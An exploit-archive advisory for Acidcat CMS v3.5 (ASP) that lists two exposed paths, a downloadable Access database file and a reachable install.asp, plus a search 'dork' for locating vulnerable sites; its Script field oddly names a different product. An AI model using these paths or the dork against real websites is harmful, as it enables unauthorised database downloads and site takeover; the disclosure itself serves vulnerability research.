id: 10577
date: 01/03/2010
title: Acidcat CMS v3.5 Multiple Vulnerabilities
author: LionTurk
cves: 

=========================================
Acidcat CMS v3.5 Multiple Vulnerabilities
=========================================

 [»] Script:             [  Mini-NUKE v2.3 Freehost  ] 
 
    [»] Language:           [ ASP ] 
 
    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] 
########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
  [»] http://server/[dizin]/databases/acidcat_3.mdb
 
  [»] http://server/[dizin]/install.asp
 
 
  
 
 
  [»] Powered by Acidcat CMS v 3.5.1.f



#  0day.today [2023-03-24]  #